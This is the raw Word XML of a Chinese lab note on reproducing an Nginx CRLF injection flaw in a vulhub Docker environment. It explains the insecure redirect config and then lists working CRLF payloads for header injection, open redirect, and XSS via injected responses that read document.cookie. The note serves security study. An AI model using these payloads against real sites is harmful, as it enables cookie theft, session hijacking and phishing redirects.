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D5B5" w14:textId="6ABEB97F" w:rsidR="009B1F2B" w:rsidRPr="0009710B" w:rsidRDefault="00DB3E9C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Nginx </w:t>
      </w:r>
      <w:r w:rsidR="00CA007D">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00463EF9" w:rsidRPr="0009710B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CRLF注入 响应截断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F60F80" w14:textId="20B52694" w:rsidR="00463EF9" w:rsidRDefault="0009710B">
      <w:r>
        <w:t>CR %0d LF %0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（回车+换行）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71758880" w14:textId="0720CB7E" w:rsidR="00305B28" w:rsidRPr="00B27A50" w:rsidRDefault="00B27A50">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B27A50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CRLF注入</w:t>
      </w:r>
      <w:r w:rsidR="00305B28" w:rsidRPr="00B27A50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>原因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E34FF" w14:textId="0E164C45" w:rsidR="0009710B" w:rsidRDefault="008740CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应截断因为没有对用户提交的数据进行严格过滤使得服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00305B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可能创建两个HTTP响应 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以控制第二个响应并加载攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081FAF2" w14:textId="58D1D92E" w:rsidR="00305B28" w:rsidRDefault="00305B28">
      <w:r w:rsidRPr="00305B28">
        <w:t>CVE-2018-1474</w:t>
      </w:r>
      <w:r w:rsidRPr="00305B28">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22326DD6" w14:textId="1D84E4B5" w:rsidR="00305B28" w:rsidRDefault="00305B28">
      <w:r w:rsidRPr="00305B28">
        <w:t>CVE-2018-11347</w:t>
      </w:r>
      <w:r w:rsidRPr="00305B28">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="063948E6" w14:textId="35A8CB9B" w:rsidR="00305B28" w:rsidRDefault="00305B28">
      <w:r w:rsidRPr="00305B28">
        <w:t>CVE-2018-7830</w:t>
      </w:r>
      <w:r w:rsidRPr="00305B28">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03560F78" w14:textId="63A7DBFA" w:rsidR="00305B28" w:rsidRDefault="00305B28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305B28">
        <w:t>CVE-2018-7830</w:t>
      </w:r>
      <w:r w:rsidRPr="00305B28">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA9D0BA" w14:textId="117AF5FB" w:rsidR="008740CF" w:rsidRPr="008740CF" w:rsidRDefault="008740CF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008740CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D7AE1D" w14:textId="5746FE5C" w:rsidR="008740CF" w:rsidRDefault="008740CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135BA404" w14:textId="72615310" w:rsidR="0009710B" w:rsidRDefault="008740CF">
      <w:r w:rsidRPr="008740CF">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008740CF">
        <w:t>vulhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008740CF">
        <w:t>/nginx/insecure-configuration目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8AE2E1" w14:textId="2A8210E1" w:rsidR="008740CF" w:rsidRDefault="008740CF">
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ocker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> compose up -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01CFF8C2" w14:textId="20E208E2" w:rsidR="008740CF" w:rsidRDefault="00305B28">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（注意一个事 </w:t>
      </w:r>
      <w:r>
        <w:t>0.0.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会绕过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r>
        <w:t>suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C818753" w14:textId="7B6F34E8" w:rsidR="00305B28" w:rsidRDefault="00A62CB7" w:rsidP="00305B28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:t>ip:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2951A4CA" w14:textId="40F6ED22" w:rsidR="00463D09" w:rsidRDefault="00463D09" w:rsidP="00305B28"/>
    <w:p w14:paraId="1D792574" w14:textId="0146AC25" w:rsidR="00A62CB7" w:rsidRDefault="00B27A50" w:rsidP="00A62CB7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B27A50">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Nginx  </w:t>
      </w:r>
      <w:r w:rsidRPr="00B27A50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CRLF注入</w:t>
      </w:r>
      <w:r w:rsidR="00A62CB7" w:rsidRPr="00B27A50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>原因在于 nginx配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F36400A" w14:textId="48257C0B" w:rsidR="00B27A50" w:rsidRPr="00B27A50" w:rsidRDefault="00B27A50" w:rsidP="00A62CB7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.13.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9EA4E3" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>location / {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202878D3" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">return 302 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>https://$host$uri;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4BB000C2" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A19DE9B" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRPr="00463D09" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转到</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00463D09">
        <w:t>Nginx会将$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463D09">
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463D09">
        <w:t>进行解码，导致传入%0a%0d即可引入换行符，造成CRLF注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC386A9" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00305B28"/>
    <w:p w14:paraId="645C5AF8" w14:textId="77777777" w:rsidR="00A4633C" w:rsidRDefault="00A4633C" w:rsidP="00A4633C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里的nginx的配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C0337B" w14:textId="5BF4148E" w:rsidR="00A62CB7" w:rsidRDefault="00A4633C" w:rsidP="00305B28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463D09">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DC5784F" wp14:editId="1CBEF8AD">
            <wp:extent cx="5274310" cy="1818005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="145146289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2892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36CC" w14:textId="77777777" w:rsidR="00463D09" w:rsidRDefault="00463D09" w:rsidP="00305B28"/>
    <w:p w14:paraId="223907E2" w14:textId="7FD5FEAD" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00305B28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ur</w:t>
      </w:r>
      <w:r>
        <w:t>psuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4356BA1F" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00305B28"/>
    <w:p w14:paraId="36A9F8DE" w14:textId="399EDC00" w:rsidR="00A62CB7" w:rsidRDefault="0072460E" w:rsidP="00305B28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://img-blog.csdnimg.cn/00a85f0dc20448d9a72f0f1f8aee3c73.png"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07BBE0" wp14:editId="7E8B1B2F">
            <wp:extent cx="5274310" cy="2482850"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="9910784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784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D5029F" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00305B28"/>
    <w:p w14:paraId="0E36EF24" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00305B28"/>
    <w:p w14:paraId="2ACDA1C2" w14:textId="26C1BAEF" w:rsidR="00A62CB7" w:rsidRDefault="0072460E" w:rsidP="00305B28">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Payload: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://your-ip:8080/%0a%0dSet-Cookie:%20a=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，可注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Set-Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>头。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A148A8" w14:textId="42A1FAF0" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00305B28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4AFFFD" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00305B28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201CA73A" w14:textId="0C102631" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00305B28">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CRLF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773EAA43" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>探测漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A16B2B1" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>%0d%0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="13D20EF0" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>%0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7C93D078" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>%0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4DB19024" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>%23%0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2FF39B5B" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>%3f%0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2F9BC993" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>/%250</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0690EC3D" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>/%250</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00C39FDA" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>/%%0a0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6BD830CE" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>/%3f%0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5FD53B08" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>/%23%0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="12469260" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>/%25%30</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="386A3901" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>/%25%30%61</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>header:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="27E01FEF" w14:textId="5E19A3D1" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>/%u000</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aheader:header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="78C74011" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7"/>
    <w:p w14:paraId="294D60C6" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>开放重定向：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F5FC8B" w14:textId="18864FBE" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>/www.google.com/%2f%2e%2e%0d%0aheader:header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729A49B1" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7"/>
    <w:p w14:paraId="19702D29" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>CRLF-XSS：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6B30FE" w14:textId="7F813CE8" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a&lt;svg%20οnlοad=alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&gt;%0d%0a0%0d%0a/%2e%2e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF426A0" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7"/>
    <w:p w14:paraId="08873172" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>XSS绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC6514" w14:textId="4580A912" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)%3c/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F974E6" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7"/>
    <w:p w14:paraId="6D941EDC" w14:textId="77777777" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>Location：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F7A82C" w14:textId="6670DFEC" w:rsidR="00A62CB7" w:rsidRDefault="00A62CB7" w:rsidP="00A62CB7">
      <w:r>
        <w:t>%0d%0aContent-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Type:%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51636A39" w14:textId="77777777" w:rsidR="00F514AC" w:rsidRDefault="00F514AC" w:rsidP="00A62CB7"/>
    <w:p w14:paraId="0079E143" w14:textId="77777777" w:rsidR="00F514AC" w:rsidRDefault="00F514AC" w:rsidP="00A62CB7"/>
    <w:p w14:paraId="763BBF7D" w14:textId="36722F34" w:rsidR="00652051" w:rsidRDefault="00652051" w:rsidP="00A62CB7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在8</w:t>
      </w:r>
      <w:r>
        <w:t>080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问不了</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0065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9"/>
    <w:rsid w:val="0009710B"/>
    <w:rsid w:val="001D3CBF"/>
    <w:rsid w:val="00231B17"/>
    <w:rsid w:val="00305B28"/>
    <w:rsid w:val="00463D09"/>
    <w:rsid w:val="00463EF9"/>
    <w:rsid w:val="00480C22"/>
    <w:rsid w:val="005A1CB5"/>
    <w:rsid w:val="00652051"/>
    <w:rsid w:val="0072460E"/>
    <w:rsid w:val="008740CF"/>
    <w:rsid w:val="008B738E"/>
    <w:rsid w:val="009B1F2B"/>
    <w:rsid w:val="00A4633C"/>
    <w:rsid w:val="00A62CB7"/>
    <w:rsid w:val="00B27A50"/>
    <w:rsid w:val="00CA007D"/>
    <w:rsid w:val="00DB3E9C"/>
    <w:rsid w:val="00F514AC"/>
    <w:rsid w:val="00F7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A42B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{36C03475-E945-5349-8D1D-B17821FF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246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12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-16T06:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-16T11:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>